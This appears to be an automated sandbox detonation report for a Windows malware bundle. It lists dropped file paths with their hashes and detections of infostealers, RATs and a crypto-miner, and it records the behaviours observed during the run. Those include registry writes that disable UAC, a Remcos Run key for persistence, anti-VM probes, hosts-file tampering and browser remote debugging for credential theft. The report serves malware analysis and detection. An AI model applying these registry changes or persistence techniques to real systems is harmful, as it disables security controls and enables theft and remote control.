SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
SHA512 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

MD5 f0aaf1b673a9316c4b899ccc4e12d33e
SHA1 294b9c038264d052b3c1c6c80e8f1b109590cf36
SHA256 fcc616ecbe31fadf9c30a9baedde66d2ce7ff10c369979fe9c4f8c5f1bff3fc2
SHA512 97d149658e9e7a576dfb095d5f6d8956cb185d35f07dd8e769b3b957f92260b5de727eb2685522923d15cd70c16c596aa6354452ac851b985ab44407734b6f21

C:\Windows\System32\Tasks\skotes

MD5 9cc0271b1bbf096b09d51e8e87c6d013
SHA1 46328dcb0ddf94156a11c7e772380d6f54a95f89
SHA256 1b3b57b9e266ce2c1028d23b48757c8c801f19ca67da9887f7cfabd6f4a5a2e3
SHA512 c4a30ab413feff1fa87304f5ee6e71aafa8fa085027ca4f659945744031c40c7badf465126c79b4a21983f5353f0509acf62d412f636842932d20ad253787bac

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 7229bce5ce94ad8c3efdac6116ca0dfd
SHA1 bab536edb7b176deedc34f51bca00786358a9238
SHA256 786cacdf01a6f995fa366ec96f869e36aea02b478426595de4d72ce297b92312
SHA512 147165e60b94781f32180d41107d81504cf6c8a08a7b235c0680af1708447341ab6cb42e4d8ba310b4425d30bb4961f91da1801f45285f32974ccd9f5a419f4b

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

MD5 78c586522f986994aa77c466c9d678a8
SHA1 4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
SHA512 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

MD5 015a5ef479c8d3e296e6a99e0fa7df6a
SHA1 69f188973fdc12d282e490041d18b01c0d49752d
SHA256 c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c
SHA512 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

MD5 0a3457f3fb0d5c837200b2849e85b206
SHA1 851c4add14eabb3b549666d2494ddcc4ebaf40b9
SHA256 aaeb0f22d9625f23135bc86f9ed7d5a877153732b9f24d3e416fe9fc7e532080
SHA512 9610c9e53770f451b9d686d39b4475fed85ef443db663d1a4945aca19f940a9f24cda9907fabecb27304e5b4f52c8b13cf00d8385e55a1edbb3eebaf78ab7cbd

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

MD5 e9fb13875b744fa633d1a7a34b0f6a52
SHA1 f0966985745541ba01800aa213509a89a7fdf716
SHA256 fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e
SHA512 c2feda22e23fda47f0b0ede38f5f432a656a5e7598c7a9d3d4e8babf9ff94189b69f4f4a3894c094260c3b72d21888720f60ed7ee2c018c8aced9d754e03e292

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 f25e48e1d9e1e1398bc5fbc6885570b8
SHA1 46557c8ebb9236af6c28c9bdd317d1d25749e710
SHA256 0379e6a5dff30a991e0acdb9932cac828eb3e30ca8cc23447a2bc73ae78181db
SHA512 41e61480f5141b6950d7b96f3e4dfcca19bc480e0b11eeebdedaeb266c6e525f41f3d29a3c1c0bf8f17a3c30111d8fba7e269d5fcf84b336bee916e21881acb7

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 c2eb31234fe828d47909a1f60d569f52
SHA1 980e0eb574e9474c14df00219eb3c4ce37cb8b6d
SHA256 4a35f6b787eedb2a6eb70b5f312e4d372d380f8faab0e5feee6eaa65784b3e94
SHA512 0a0ca77a15c980fbfc2168cea46d29939ba016c4aa1f8e0485c20dcc14b3609ff44331942f9ee193eb6e84c8b9854c1a12ad76becaabbb9921b0a9968a09cf42

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

MD5 ab3f75f41982ca216badc3e56f9d3e88
SHA1 ee26477ee9d90af2e940e6f99617e7d54b241635
SHA256 e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08
SHA512 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 fcdf1962a9323eaea99ed4f72775093e
SHA1 277f044d4ab9a5ba6b8f8ee4a7c0e3880f6c53f2
SHA256 28cfeccffb6bcec816783f0205cfdd71517b275c8e595b2ec5e988628499955b
SHA512 f39fc7265c5d2ae78956f1352419477cbdd5bc80cfbded6777393cc5351276ac081b23c96f23c4fe6e1910915053829fa18e122bb97eba3667d46b52084769a4

C:\Users\Admin\AppData\Local\Temp\a\gcapi.dll

MD5 1ce7d5a1566c8c449d0f6772a8c27900
SHA1 60854185f6338e1bfc7497fd41aa44c5c00d8f85
SHA256 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf
SHA512 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

MD5 0c1a360f7ca0e6289d8403f1ebfa4690
SHA1 891483904f22cf6495bd310c4bf7c05fc42b85ba
SHA256 2d1a3f0c2f05f3d0ee2c4c4d49abd370b0a9e9c811a98c07f8d06c368d46dffe
SHA512 f10cd6843b457e1abb0b43ec716c23e8a093dd46750ea1f378e90108f28fa6c7a02d1b9227b7b9dcf9d2e8de6489cf9f6d1d24381d2aea55e6b9dd3fba55a118

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

MD5 c566295ef2f48b51a4932af0aa993e48
SHA1 0b69f71e7f624a8b5f4b502fde9de972a94543ff
SHA256 f096fd252e752b20a37c8963bb0ef947e7a7a1794552db8b5642523db9357d8f
SHA512 d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

MD5 2ca5f321b0683c4cdd64c2ab7761c2db
SHA1 1af4717e30ee791aa16c88f5d319bc949bdec2d5
SHA256 b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4
SHA512 a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

MD5 8b712dbac428c4107c3c44f92743d8e6
SHA1 65027334951d9be6149627fef6a45f2397cfe747
SHA256 fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3
SHA512 e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

MD5 d25c3bd6c96b1d4b95f492a9daa4a6a1
SHA1 9b4f388fec4511ce3fa5bf855626c7c7b517ac21
SHA256 fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9
SHA512 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

MD5 ac1997ffe0c45d75cec0f1bbfe24cd62
SHA1 67f28f8d9ff0a2f3a6d84948f541b204339a26e4
SHA256 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a
SHA512 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

MD5 6304ce36f17952d70bceb540d4b916ac
SHA1 737d2ecf8f514e85c2776416100eefb5ea23391c
SHA256 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78
SHA512 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e

C:\ProgramData\AnyDesk\system.conf

MD5 25e71767a94343d45dd3e066c05784bf
SHA1 901ae90156458e9b91f29cb0789964a5bfbc1127
SHA256 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525
SHA512 ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6

C:\ProgramData\AnyDesk\system.conf

MD5 4f559d9257cbacf85aaeb62f530c70cd
SHA1 23c369aeb9a8f6e8c036291a159bfa94b7595f91
SHA256 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598
SHA512 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

MD5 8e0d340e723ce188de651b8ffb887d81
SHA1 cb90a07f1a4ffae68cca6281325606009d3d7266
SHA256 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7
SHA512 d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\ProgramData\AnyDesk\system.conf

MD5 97d9059805b59a38cef6036e01ac9056
SHA1 40429fc8a0d83c6f06f35597e86cc27ef34e1603
SHA256 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc
SHA512 eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

C:\ProgramData\AnyDesk\system.conf

MD5 00492073968f429aa15f846b05734abd
SHA1 10c780c8823c596b573920a9512669f835b0a4cd
SHA256 e1d9080aefbe65664c44397a1f32ff65fd9d7d2c3be70b798b96eb5996dd89d9
SHA512 27f2940415119814410ce466acee0c98e04f4ddccac2532f9cb2db97916c5f0187c8c759649e91fd2373e85da6a9b89ccd9d5486a5741528ff9a853ac26116f8

C:\ProgramData\AnyDesk\system.conf

MD5 4632db03390d946c7203ab740ed675ae
SHA1 dd1bf137dfc473f27812141d26c7637a5f52762f
SHA256 1137936891f91d3564d2f2a12c35f551c8dc5036c914a3610f111e550852a5c8
SHA512 cdded7ac54483b1bebc7ff7505f7d0381f1b1a97648b8e963b0084f33a465084d1e1b3213428a8d9726bb68027b6fbeface3eecb1941c93cd6dc7620b3c9446a

C:\ProgramData\AnyDesk\system.conf

MD5 4b7c630cdf106dbb92bf5956e18d6ea0
SHA1 df632a9931de7360b9b9c14c1c95db83daf45b1a
SHA256 e3036170507bfd31fd5a734f7d3b2cb10e980f89bb1962361d6ab786d23431c9
SHA512 4f076d2a0d109c53911b7fd856f144dafa2a0ec02611de4fc57584a5f458155809cf9243f8939640a1e4e1e02163838ea65c338e5d5632eff7b13bc8589f5585

C:\ProgramData\AnyDesk\system.conf

MD5 c38812c636e3c0b5b94e15c135a736c0
SHA1 3e3a3b0ec09b34521282ada8439730662af5d6d8
SHA256 23f7ff585409734df1bfb29d9101bc6a8ec44a41079eebf699e568c4c10cdd36
SHA512 5baf8d3ba715c089fe326bdd0f11c9aa62c88a7194db5ea4809780fe69c3d09b70cde2f4f8a473134692ef4b342bd3d18ea5e3c04eb51b4694e8f8b6b152940c

C:\ProgramData\AnyDesk\service.conf

MD5 1571ac8abb5f7e94d16cda9a61f69a62
SHA1 7537508c386ccde8da472d1aa3403d8583020123
SHA256 141d1c772553ba42dd4cb21ed07f00bfa1db06bc19432603af5a678c5f86166b
SHA512 a596f2b979bb3365358bd46dd9bd69f58c73a25186de690402bba436d7128896d0b5f4e7713d9f31b95e385b411a6ecb166fe997900e1a7ce6b7cd7319956965

C:\ProgramData\AnyDesk\service.conf

MD5 83fab3de835e536b54070485ee73b11a
SHA1 532ea4d404622556ebf1a7c3fd061cb42163f49a
SHA256 f778ecbcd94e28a5eb3eae07a1330b2b7c1a3b61241f8deb41ab71e825497504
SHA512 64873890c80c47398d658ae85acf8cba737ba425fff706a673fa21e36feced3b8e53c9fbb56e3b91c97e5f5faf7fab46b67c2c119c632ebb21271cd9574e3e61

C:\ProgramData\AnyDesk\system.conf

MD5 4e24eeda3d3f9adb95ed2a2786b88fdf
SHA1 29d45ae55f61634bd3c3576bfac97c15f53b62e7
SHA256 c58e3c7b3c28fc414459e62cff0952a948e9e7911e1f2cc913f3523bc9599e62
SHA512 8535aa7639e730832da0d48862d0816cfdcd04da60a8c7343c8413e22b4270b9e2e06c23d2539585a3d172fe1e5a116f2c37a4818a020e646cfac00242aa68f7

C:\ProgramData\AnyDesk\system.conf

MD5 fed60826e671b7f25af145e3f15e24b4
SHA1 850c792730c135de028447308d5d541812d5ddc3
SHA256 3deb748ddd3314d4e4b1ea473fc3ca365e1915dd577da1d4de1cdaf9664fa105
SHA512 54abd1caec3fb2dc31c602fa5bd83a182fa2274091f94ae5b562f12fd0cd41ff940926c045392b59a7e89fded056e3871f18df2cb7a01df501733ccada27303c

C:\ProgramData\AnyDesk\system.conf

MD5 005c56c45b84451f00829acaced6dc62
SHA1 a595402d1cf107065fb8a49ebb4e3af2951ba4c8
SHA256 5eeb209d98540e9af832980e42dbcfc7c75e6cca547434f10e7b8d8a51954cbb
SHA512 fe3b3736e2842620ae7eab762121a7920fa85bd7b9bf9b7b33012ed5cb1e5a44b07f451a8db37ad75ea05dd50ea91533b275e9321a24ff933e2ad4854b447914

C:\ProgramData\AnyDesk\system.conf

MD5 4b84a7cdce3c507cffc83c37b5120db6
SHA1 19c97c0f82a714baeb51afbe241e402352a8c743
SHA256 aaec0a4771c3203014eb4ba03c1668e00bbd2558b37505976357d2ceaed81507
SHA512 ee2f7442c431c7021c90e23fe1e3ac67f61456b7e81997f1a7d6f3d4d9b0d71dd7f73bf52c57fec12ecffe3880c957213aec15ef40c66994987dffa4e5382fb4

C:\ProgramData\AnyDesk\system.conf

MD5 689c4334d3e224061d056d8d1f829683
SHA1 65fdb8873fb74f9c026d5e85e7b391caa5b2627a
SHA256 492634f9770eb72f42e9a91d57b052316e04267ea53a58786be2881778b1dcf6
SHA512 55aadb74421812140235655010078297398a2de736a8cc65b13ee08909b538152fa48a961040868a9726c36e57b834732f8ba7dc4b8aa17d8ac4716a0f7dcbb0

C:\ProgramData\AnyDesk\system.conf

MD5 cd20b228ff83b5c360c02570358dedd8
SHA1 30f747170dc40f1e4fc5d5c65973e73a800d500b
SHA256 a93a23ba5d5c8d008d9b9e16f668517a93f33cb5296b5e897197e095280e7d34
SHA512 6c7b4ac7f6abfe5f5a78c7ba9bc4bd233b554fbc8a69db4f4a11b3d37265cd4ab44304df88357fb64ab0db1304f223f62ef9941b5d9e98cadb64c66da46ab168

C:\ProgramData\AnyDesk\system.conf

MD5 5f62d3b47af32ec5f9cc5823dfef4215
SHA1 c4ca9f9073a2aa89f0276b28fa7e2bfe14f7d694
SHA256 2b137e654c82d3866ca9c2ca7083a8a234b107d6250b932a41de07853a05ec1b
SHA512 102a558809d3d109dc55a276ccb353ba8cedb19373b78ef0a22900f7c0d3ff061f13037238931fe909f4f2be017e07e4788a307a3acbc8d683f10631ca86ce87

C:\ProgramData\AnyDesk\system.conf

MD5 bb6b202ab1606ca947990f09307d7423
SHA1 009752509f0d5c75fc9a9cd3f23ffcbfd6c89690
SHA256 9787480d2f8740d430cd8ef805471221c63ccf722df6e7ec5a76838cba0ccbe6
SHA512 4224f6eaa0239cf0922f68a000ae9300feb1cf7facdb3551c32242b3285d7d2463f11c60c00a14d03258d3747dc90b325352e545c5d1d03257f5a5ffecadb7dc

C:\ProgramData\AnyDesk\system.conf

MD5 f2f2e871f0e5c47c1dfd36e53b0b687d
SHA1 ec4dbb3c4f7d4c36c8084cd1c7f250a58bf3a1a6
SHA256 75af50fdae482ce053b08db23163d252906104c8d1bdaca0f58774c17d4f6b11
SHA512 d96579f87126b04ef0d675e16eab682bb582590fb11f12dda432eb391a187ed2c835d449adef35d55a796d2c23e361823061504f63b7085dd96e5217af7e461b

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\DenyRegister.csv

MD5 6ad68fcedea3ac5903538f152122de14
SHA1 cc03629c7b216e7465d490f955d221e82330ce91
SHA256 c4e755a615e8f4423afe36936df6d1010bd9629e2b37c411ca1bd2cd02ff7411
SHA512 675082dab06f2a8fe30414d522c4ce6673a190dd7b69f9d2d4bf07678b6a819b9d22b92c09f2b53b8f1d14fda8f095b7d7f92d0de0e3337d9248c89188beb458

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\WaitResume.docx

MD5 1129044bf9629b34cd5fd01a1ed5a6ad
SHA1 61999fb56b01cd4dd6c254c07019762ef99f4557
SHA256 e5238dd5843917f34d4fde78b54b5a38feb1a41ce518818f4c003e486edc4f8d
SHA512 715ee50f11544de57ae79d67350d8fe701505d19d856c26b37596c48db21f5d643f1f9347492b2535e40e7b29eba6add66b0d2ccfa7a48df3a2e8f7a88f43c6e

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\PublishBackup.docx

MD5 8f5bf952ca67c2f7357e97e2585a2cd1
SHA1 dea1f5d43ab0ae53a33b6d814ae812a514259add
SHA256 134158bbc6a3769e6f7cd31e3134f6e1af78e4e413a26c39ce695497e016ea28
SHA512 18c4716300628a12ae949e63090da4f8661fc6c70a931f50bcb5e238f2b8f7dda3b5711efaded1b32d660b81ef3456a038e5bbe7baf04bae046363f668799cb1

C:\Users\Admin\AppData\Local\Temp\   ‏      \Common Files\Desktop\MountOpen.docx

MD5 ed983cffe1754ca63b3e7d7773b97a96
SHA1 c4caf2aa596eef333c3bc7617e2c0353799ffd2a
SHA256 261737670e35373f4e4f6e1edf14252ee35d46ef52ad126ececd601606d8bfb5
SHA512 00228cd96f2017c37fe6ff4614dd138647a1e71c0b56fe4e2f1555cf7e0ee864963724a34d394e873214f2ac3140307557b5e584c876eb2662dd930d2f6b7c46

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 9ca76314f444aade766954f10e3ede9a
SHA1 9f21b0e60014d9194747c9f984dd7963f4f32601
SHA256 0b97e881e49945e6316aaaa94d4abf7ee08e31beb72946ae64de90471196c0ad
SHA512 67215a7f64bc5d6fe617c0eca79944fa156b54af5329a1e0e3c36db94ee45d9539ad9918440919cc86021a0d4b24d612bf5732bc207f187a5a8c9b436dec3401

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 c1bede31ffcd226a9c02ba016f01352d
SHA1 e99640d2868fccba6af7b6bafa00a8d10b9ae1b0
SHA256 4c63f319b42027c146bd3db011d3571cd7d9fe8f1684752183c7d22a4ef16cf5
SHA512 dfd5bac4cc34ccd05734346bc6a04a9a193f537498b5f4601ab2fb3e20d5c159453f8e09ab9b1ca88207a0c3673e0bad28dc3651505b4dcab5c7045faf52e458

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 69d032dc127adf8f738389483d711e9e
SHA1 6d17b1dbb9eb16572cec4ee9888c45ba1167cf77
SHA256 4308bb8485a1b5cb1d105080d3d986e03653fcc70b5ed82048b7c62aea875d3f
SHA512 29e23842dce5b3a8e48a2acb74d57adb364476bf08fda0393c30d38749fff6916021f9ee5a731673954fe027f51c4cc81991fb8d5f4b6d9148fb9783ef87f065

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

MD5 ff7e78da9c8e580229fe95dfdfe5b098
SHA1 ab968e47e463f29426116753b0ca086fd5b33cdb
SHA256 cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d
SHA512 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

MD5 d6b16370cd4e60185aa88607316a0c05
SHA1 7fbc63b1203617c67e5491745beaedb424baed78
SHA256 a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2
SHA512 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:40

Platform

win10v2004-20241007-en

Max time kernel

355s

Max time network

1201s

Command Line

C:\Windows\Explorer.EXE

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF C:\Users\Admin\Desktop\Files\random.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
